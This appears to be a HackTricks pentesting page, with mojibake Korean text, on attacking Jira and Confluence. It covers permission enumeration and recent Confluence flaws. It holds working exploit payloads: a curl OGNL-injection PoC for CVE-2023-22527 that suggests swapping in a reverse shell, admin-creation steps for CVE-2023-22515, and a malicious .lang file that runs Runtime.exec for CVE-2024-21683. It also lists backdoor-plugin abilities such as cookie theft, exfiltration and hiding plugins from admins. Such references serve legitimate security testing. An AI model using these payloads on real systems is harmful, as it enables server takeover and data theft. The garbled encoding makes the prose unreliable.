Jira & Confluence

Tip

AWS ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ:HackTricks Training AWS Red Team Expert (ARTE)
GCP ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training GCP Red Team Expert (GRTE) Azure ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks ์ง€์›ํ•˜๊ธฐ

๊ถŒํ•œ ํ™•์ธ

Jira์—์„œ๋Š” ์ธ์ฆ ์—ฌ๋ถ€์™€ ๊ด€๊ณ„์—†์ด ๋ชจ๋“  ์‚ฌ์šฉ์ž๊ฐ€ /rest/api/2/mypermissions ๋˜๋Š” /rest/api/3/mypermissions ์—”๋“œํฌ์ธํŠธ๋ฅผ ํ†ตํ•ด ๊ถŒํ•œ์„ ํ™•์ธํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ์ด ์—”๋“œํฌ์ธํŠธ๋“ค์€ ์‚ฌ์šฉ์ž๊ฐ€ ํ˜„์žฌ ๋ณด์œ ํ•œ ๊ถŒํ•œ์„ ๋…ธ์ถœํ•ฉ๋‹ˆ๋‹ค. ํŠนํžˆ ๋น„์ธ์ฆ ์‚ฌ์šฉ์ž์—๊ฒŒ ๊ถŒํ•œ์ด ๋ถ€์—ฌ๋œ ๊ฒฝ์šฐ๋Š” ๋ณด์•ˆ ์ทจ์•ฝ์ ์„ ์˜๋ฏธํ•˜๋ฉฐ, ์ด๋Š” bounty ๋Œ€์ƒ์ด ๋  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ๋งˆ์ฐฌ๊ฐ€์ง€๋กœ ์ธ์ฆ ์‚ฌ์šฉ์ž์—๊ฒŒ ์˜ˆ์ƒ์น˜ ๋ชปํ•œ ๊ถŒํ•œ์ด ์žˆ๋Š” ๊ฒฝ์šฐ๋„ ์ทจ์•ฝ์ ์œผ๋กœ ๊ฐ„์ฃผ๋ฉ๋‹ˆ๋‹ค.

์ค‘์š”ํ•œ ์—…๋ฐ์ดํŠธ๊ฐ€ 2019๋…„ 2์›” 1์ผ์— ์ด๋ฃจ์–ด์ ธ, โ€˜mypermissionsโ€™ ์—”๋“œํฌ์ธํŠธ๊ฐ€ โ€˜permissionโ€™ ํŒŒ๋ผ๋ฏธํ„ฐ๋ฅผ ํฌํ•จํ•˜๋„๋ก ์š”๊ตฌํ•˜๊ฒŒ ๋˜์—ˆ์Šต๋‹ˆ๋‹ค. ์ด ์š”๊ตฌ์‚ฌํ•ญ์€ ์กฐํšŒํ•  ๊ถŒํ•œ์„ ์ง€์ •ํ•จ์œผ๋กœ์จ ๋ณด์•ˆ์„ ๊ฐ•ํ™”ํ•˜๋ ค๋Š” ๋ชฉ์ ์ž…๋‹ˆ๋‹ค: ์—ฌ๊ธฐ์—์„œ ํ™•์ธํ•˜์„ธ์š”

  • ADD_COMMENTS
  • ADMINISTER
  • ADMINISTER_PROJECTS
  • ASSIGNABLE_USER
  • ASSIGN_ISSUES
  • BROWSE_PROJECTS
  • BULK_CHANGE
  • CLOSE_ISSUES
  • CREATE_ATTACHMENTS
  • CREATE_ISSUES
  • CREATE_PROJECT
  • CREATE_SHARED_OBJECTS
  • DELETE_ALL_ATTACHMENTS
  • DELETE_ALL_COMMENTS
  • DELETE_ALL_WORKLOGS
  • DELETE_ISSUES
  • DELETE_OWN_ATTACHMENTS
  • DELETE_OWN_COMMENTS
  • DELETE_OWN_WORKLOGS
  • EDIT_ALL_COMMENTS
  • EDIT_ALL_WORKLOGS
  • EDIT_ISSUES
  • EDIT_OWN_COMMENTS
  • EDIT_OWN_WORKLOGS
  • LINK_ISSUES
  • MANAGE_GROUP_FILTER_SUBSCRIPTIONS
  • MANAGE_SPRINTS_PERMISSION
  • MANAGE_WATCHERS
  • MODIFY_REPORTER
  • MOVE_ISSUES
  • RESOLVE_ISSUES
  • SCHEDULE_ISSUES
  • SET_ISSUE_SECURITY
  • SYSTEM_ADMIN
  • TRANSITION_ISSUES
  • USER_PICKER
  • VIEW_AGGREGATED_DATA
  • VIEW_DEV_TOOLS
  • VIEW_READONLY_WORKFLOW
  • VIEW_VOTERS_AND_WATCHERS
  • WORK_ON_ISSUES

์˜ˆ: https://your-domain.atlassian.net/rest/api/2/mypermissions?permissions=BROWSE_PROJECTS,CREATE_ISSUES,ADMINISTER_PROJECTS

#Check non-authenticated privileges
curl https://jira.some.example.com/rest/api/2/mypermissions | jq | grep -iB6 '"havePermission": true'

์ž๋™ํ™”๋œ ์—ด๊ฑฐ

์ตœ๊ทผ RCEs ๋ฐ ์‹ค์šฉ์ ์ธ exploit ๋…ธํŠธ (Confluence)

CVE-2023-22527 โ€“ ์ธ์ฆ๋˜์ง€ ์•Š์€ template/OGNL injection (10.0)

  • Confluence Data Center/Server 8.0.xโ€“8.5.3 & 8.4.5์— ์˜ํ–ฅ์„ ๋ฏธ์นจ. ์ทจ์•ฝํ•œ Velocity ํ…œํ”Œ๋ฆฟ text-inline.vm์ด ์ธ์ฆ ์—†์ด OGNL ํ‰๊ฐ€๋ฅผ ํ—ˆ์šฉํ•จ.
  • ๊ฐ„๋‹จํ•œ PoC (๋ช…๋ น์€ confluence user๋กœ ์‹คํ–‰๋จ):
curl -k -X POST "https://confluence.target.com/template/aui/text-inline.vm" \
-H 'Content-Type: application/x-www-form-urlencoded' \
--data 'label=aaa%27%2b#request.get("KEY_velocity.struts2.context").internalGet("ognl").findValue(#parameters.poc[0],{})%2b%27&poc=@org.apache.struts2.ServletActionContext@getResponse().setHeader("x-cmd",(new+freemarker.template.utility.Execute()).exec({"id"}))'
  • ์‘๋‹ต ํ—ค๋” x-cmd์—๋Š” ๋ช…๋ น ์ถœ๋ ฅ์ด ํฌํ•จ๋ฉ๋‹ˆ๋‹ค. id๋ฅผ reverse shell payload๋กœ ๊ต์ฒดํ•˜์„ธ์š”.
  • ์Šค์บ๋„ˆ: nuclei template http/cves/2023/CVE-2023-22527.yaml (nuclei-templates โ‰ฅ9.7.5์— ํฌํ•จ).

CVE-2023-22515 โ€“ setup ์žฌํ™œ์„ฑํ™”๋กœ ๊ด€๋ฆฌ์ž ์ƒ์„ฑ (auth bypass)

  • Publicly reachable Confluence Data Center/Server 8.0.0โ€“8.5.1์—์„œ๋Š” setupComplete๋ฅผ ์ „ํ™˜ํ•˜๊ณ  /setup/setupadministrator.action๋ฅผ ๋‹ค์‹œ ์‹คํ–‰ํ•˜์—ฌ ์ƒˆ๋กœ์šด ๊ด€๋ฆฌ์ž ๊ณ„์ •์„ ์ƒ์„ฑํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.
  • Minimal exploit flow:
  1. GET /server-info.action (unauthenticated)๋กœ ์ ‘๊ทผ ๊ฐ€๋Šฅ ์—ฌ๋ถ€ ํ™•์ธ.
  2. POST /server-info.action์— buildNumber ํŒŒ๋ผ๋ฏธํ„ฐ๋ฅผ ์ „์†กํ•˜์—ฌ setup ํ”Œ๋ž˜๊ทธ๋ฅผ ํ† ๊ธ€.
  3. POST /setup/setupadministrator.action์— fullName, email, username, password, confirm์„ ํฌํ•จํ•ด ๊ด€๋ฆฌ์ž ๊ณ„์ • ์ƒ์„ฑ.

CVE-2024-21683 โ€“ Code Macro ์—…๋กœ๋“œ๋ฅผ ํ†ตํ•œ ์ธ์ฆ๋œ RCE

  • Confluence Admin์€ Configure Code Macro์—์„œ ์กฐ์ž‘๋œ language definition์„ ์—…๋กœ๋“œํ•  ์ˆ˜ ์žˆ์œผ๋ฉฐ, Rhino engine์ด ํฌํ•จ๋œ Java๋ฅผ ์‹คํ–‰ํ•˜์—ฌ RCE๋กœ ์ด์–ด์ง‘๋‹ˆ๋‹ค.
  • ์‰˜์„ ์–ป์œผ๋ ค๋ฉด .lang ํŒŒ์ผ์— ๋‹ค์Œ๊ณผ ๊ฐ™์€ payload๋ฅผ ํฌํ•จํ•˜์—ฌ ์—…๋กœ๋“œํ•˜์„ธ์š”:
<?xml version="1.0"?>
<languages>
<language key="pwn" name="pwn" namespace="java.lang">
<tokens>
<token scope="normal">${"".getClass().forName("java.lang.Runtime").getRuntime().exec("id")}</token>
</tokens>
</language>
</languages>
  • ์•…์„ฑ ์–ธ์–ด๋ฅผ Code Macro ๋ณธ๋ฌธ์—์„œ ์„ ํƒํ•˜๋ฉด ํŠธ๋ฆฌ๊ฑฐ๋ฉ๋‹ˆ๋‹ค. Metasploit module exploit/multi/http/atlassian_confluence_rce_cve_2024_21683๋Š” auth + upload + exec๋ฅผ ์ž๋™ํ™”ํ•ฉ๋‹ˆ๋‹ค.

Atlasian ํ”Œ๋Ÿฌ๊ทธ์ธ

์ด blog์—์„œ ์„ค๋ช…ํ•œ ๊ฒƒ์ฒ˜๋Ÿผ, Plugin modules โ†— ๋ฌธ์„œ์—์„œ๋Š” ๋‹ค์Œ๊ณผ ๊ฐ™์€ ๋‹ค์–‘ํ•œ ์œ ํ˜•์˜ ํ”Œ๋Ÿฌ๊ทธ์ธ์„ ํ™•์ธํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค:

๋‹ค์Œ์€ macro plugin ์œ ํ˜•์˜ ์˜ˆ์ž…๋‹ˆ๋‹ค:

Macro plugin ์˜ˆ์ œ ```java package com.atlassian.tutorial.macro;

import com.atlassian.confluence.content.render.xhtml.ConversionContext; import com.atlassian.confluence.macro.Macro; import com.atlassian.confluence.macro.MacroExecutionException;

import java.util.Map;

public class helloworld implements Macro {

public String execute(Map<String, String> map, String body, ConversionContext conversionContext) throws MacroExecutionException { if (map.get(โ€œNameโ€) != null) { return (โ€œ

Hello โ€œ + map.get(โ€œNameโ€) + โ€œ!

โ€); } else { return โ€œ

Hello World!

โ€; } }

public BodyType getBodyType() { return BodyType.NONE; }

public OutputType getOutputType() { return OutputType.BLOCK; } }

</details>

์ด ํ”Œ๋Ÿฌ๊ทธ์ธ๋“ค์ด XSS์™€ ๊ฐ™์€ ์ผ๋ฐ˜์ ์ธ ์›น ์ทจ์•ฝ์ ์— ์ทจ์•ฝํ•  ์ˆ˜ ์žˆ์Œ์„ ํ™•์ธํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ์˜ˆ๋ฅผ ๋“ค์–ด ์•ž์˜ ์˜ˆ์ œ๋Š” ์‚ฌ์šฉ์ž ์ž…๋ ฅ์„ ๋ฐ˜์˜ํ•˜๊ธฐ ๋•Œ๋ฌธ์— ์ทจ์•ฝํ•ฉ๋‹ˆ๋‹ค.

XSS๊ฐ€ ๋ฐœ๊ฒฌ๋˜๋ฉด [**this github repo**](https://github.com/cyllective/XSS-Payloads/tree/main/Confluence)์—์„œ XSS์˜ ์˜ํ–ฅ๋ ฅ์„ ๋†’์ด๊ธฐ ์œ„ํ•œ ๋ช‡ ๊ฐ€์ง€ payloads๋ฅผ ์ฐพ์„ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

## ๋ฐฑ๋„์–ด ํ”Œ๋Ÿฌ๊ทธ์ธ

[**This post**](https://cyllective.com/blog/posts/atlassian-malicious-plugin)์—์„œ๋Š” ์•…์„ฑ Jira ํ”Œ๋Ÿฌ๊ทธ์ธ์ด ์ˆ˜ํ–‰ํ•  ์ˆ˜ ์žˆ๋Š” ๋‹ค์–‘ํ•œ(์•…์„ฑ) ๋™์ž‘๋“ค์„ ์„ค๋ช…ํ•ฉ๋‹ˆ๋‹ค. [**code example in this repo**](https://github.com/cyllective/malfluence)์—์„œ ์ฝ”๋“œ ์˜ˆ์ œ๋ฅผ ํ™•์ธํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

๋‹ค์Œ์€ ์•…์„ฑ ํ”Œ๋Ÿฌ๊ทธ์ธ์ด ์ˆ˜ํ–‰ํ•  ์ˆ˜ ์žˆ๋Š” ๋ช‡ ๊ฐ€์ง€ ๋™์ž‘์ž…๋‹ˆ๋‹ค:

- **Hiding Plugins from Admins**: ์ผ๋ถ€ ํ”„๋ก ํŠธ์—”๋“œ javascript๋ฅผ ์ฃผ์ž…ํ•˜์—ฌ ์•…์„ฑ ํ”Œ๋Ÿฌ๊ทธ์ธ์„ ๊ด€๋ฆฌ์ž์—๊ฒŒ์„œ ์ˆจ๊ธธ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.
- **Exfiltrating Attachments and Pages**: ๋ชจ๋“  ๋ฐ์ดํ„ฐ์— ์ ‘๊ทผํ•˜์—ฌ exfiltrateํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.
- **Stealing Session Tokens**: ์‘๋‹ต์—์„œ ํ—ค๋”๋ฅผ ๊ทธ๋Œ€๋กœ ๋ฐ˜ํ™˜ํ•˜๋Š” endpoint๋ฅผ ์ถ”๊ฐ€(์ฟ ํ‚ค ํฌํ•จ)ํ•˜๊ณ , ํ•ด๋‹น endpoint์— ์ ‘์†ํ•ด cookies๋ฅผ leakํ•˜๋Š” javascript๋ฅผ ์ถ”๊ฐ€ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.
- **Command Execution**: ๋ฌผ๋ก  ํ”Œ๋Ÿฌ๊ทธ์ธ์„ ๋งŒ๋“ค์–ด ์ฝ”๋“œ๋ฅผ ์‹คํ–‰ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.
- **Reverse Shell**: ๋˜๋Š” reverse shell์„ ์–ป์„ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.
- **DOM Proxying**: ๋งŒ์•ฝ confluence๊ฐ€ ํ”„๋ผ์ด๋น— ๋„คํŠธ์›Œํฌ ๋‚ด๋ถ€์— ์žˆ๋‹ค๋ฉด, ์ ‘๊ทผ ๊ถŒํ•œ์ด ์žˆ๋Š” ์‚ฌ์šฉ์ž์˜ ๋ธŒ๋ผ์šฐ์ €๋ฅผ ํ†ตํ•ด ์—ฐ๊ฒฐ์„ ์ˆ˜๋ฆฝํ•˜๊ณ  ์˜ˆ๋ฅผ ๋“ค์–ด ๊ทธ ๋ธŒ๋ผ์šฐ์ €๋ฅผ ํ†ตํ•ด ์„œ๋ฒ„์— ์ ‘์†ํ•˜์—ฌ ๋ช…๋ น์„ ์‹คํ–‰ํ•˜๋„๋ก ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

## References

- [Atlassian advisory โ€“ CVE-2023-22527 template injection RCE](https://confluence.atlassian.com/security/cve-2023-22527-rce-remote-code-execution-vulnerability-in-confluence-datacenter-and-confluence-server-1333990257.html)
- [CISA AA23-289A โ€“ Active exploitation of Confluence CVE-2023-22515](https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-289a)
> [!TIP]
> AWS ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ:<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">\
> GCP ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: <img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)<img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">
> Azure ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: <img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training Azure Red Team Expert (AzRTE)**](https://training.hacktricks.xyz/courses/azrte)<img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">
>
> <details>
>
> <summary>HackTricks ์ง€์›ํ•˜๊ธฐ</summary>
>
> - [**๊ตฌ๋… ๊ณ„ํš**](https://github.com/sponsors/carlospolop) ํ™•์ธํ•˜๊ธฐ!
> - **๐Ÿ’ฌ [**๋””์Šค์ฝ”๋“œ ๊ทธ๋ฃน**](https://discord.gg/hRep4RUj7f) ๋˜๋Š” [**ํ…”๋ ˆ๊ทธ๋žจ ๊ทธ๋ฃน**](https://t.me/peass)์— ์ฐธ์—ฌํ•˜๊ฑฐ๋‚˜ **ํŠธ์œ„ํ„ฐ** ๐Ÿฆ [**@hacktricks_live**](https://twitter.com/hacktricks_live)**๋ฅผ ํŒ”๋กœ์šฐํ•˜์„ธ์š”.**
> - **[**HackTricks**](https://github.com/carlospolop/hacktricks) ๋ฐ [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) ๊นƒํ—ˆ๋ธŒ ๋ฆฌํฌ์ง€ํ† ๋ฆฌ์— PR์„ ์ œ์ถœํ•˜์—ฌ ํ•ดํ‚น ํŠธ๋ฆญ์„ ๊ณต์œ ํ•˜์„ธ์š”.**
>
> </details>